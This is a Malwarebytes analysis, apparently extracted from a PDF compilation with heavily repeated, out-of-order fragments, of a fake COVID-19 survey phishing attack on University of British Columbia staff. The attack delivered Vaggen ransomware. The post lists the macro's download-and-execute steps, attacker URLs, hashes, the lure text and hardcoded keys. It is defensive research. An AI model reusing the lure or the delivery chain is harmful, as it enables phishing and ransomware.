3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 412 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 413 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 414 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 415 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 416 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 417 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 418 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 419 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 420 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 421 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 422 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 423 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 424 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 425 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 426 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 427 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 428 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam coming from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to see whether it was successful (the return value would be the task ID of the executed application)\r\nIf successful, it sends a GET HTTP request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET HTTP request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event.\r\nThis can be very useful as an early warning system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The following were renamed during analysis:\r\nmain_LAMNARDETTA -> main_enumDir\r\nmain_ELDBJORT -> main_encryptFile\r\nmain_SPRINGA -> main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is implemented as the callback of the standard Go library function path.filepath.Walk.\r\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 439 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 440 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 441 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). 
Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 442 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 443 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 444 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 445 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 446 of 
